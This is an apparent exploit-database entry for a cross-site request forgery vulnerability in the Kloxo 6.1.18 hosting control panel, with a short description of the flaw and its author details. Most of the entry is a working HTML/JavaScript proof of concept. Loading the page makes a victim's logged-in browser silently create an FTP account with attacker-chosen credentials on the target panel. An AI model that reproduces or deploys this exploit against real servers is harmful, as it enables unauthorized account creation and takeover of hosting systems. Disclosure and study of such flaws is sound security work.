Kloxo 6.1.18 Stable - CSRF Vulnerability



EKU-ID: 3938 CVE: OSVDB-ID:
Author: Necmettin COSKUN Published: 2014-04-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title     :Kloxo 6.1.18 Stable CSRF Vulnerability
# Vendor Homepage   :http://lxcenter.org/software/kloxo
# Version           :6.1.18
# Exploit Author    :Necmettin COSKUN =>@babayarisi
# Blog              :http://www.ncoskun.com http://www.grisapka.org
# Discovery date    :03/12/2014
# CVE               :N/A
   
Kloxo (formerly known as Lxadmin) is a free, opensource web hosting control panel for the Red Hat and CentOS Linux distributions.
================
CSRF Vulnerability
   
Vulnerability
================
Kloxo has lots of POST and GET based form applications some inputs escaped from specialchars but inputs dont have any csrf protection or secret key 
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
  
Poc Exploit
================
  
 <html>
 <head><title>Kloxo demo</title></head>
 <script type="text/javascript">
 function yurudi(){
        ///////////////////////////////////////////////////////////
        //Kloxo 6.1.18 Stable CSRF Vulnerability         // 
        //Author:Necmettin COSKUN => twitter.com/@babayarisi  //
        //Blog: http://www.ncoskun.com | http://www.grisapka.org //
        ///////////////////////////////////////////////////////////
        //Remote host
        var host="victim.com";  
        //New Ftp Username
        var username="demouser";
        //New Ftp Password
        var pass="12345678";
        //This creates new folder under admin dir. /admin/yourfolder
        var dir="demodirectory";
        //If necessary only modify http to https ;)
        var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
  
        document.getElementById('demoexploit').src=urlson;
}
 </script>
 <body onload="yurudi();">
 <img id="demoexploit" src=""></img>
 </body>
 </html>
   
   
Discovered by:
================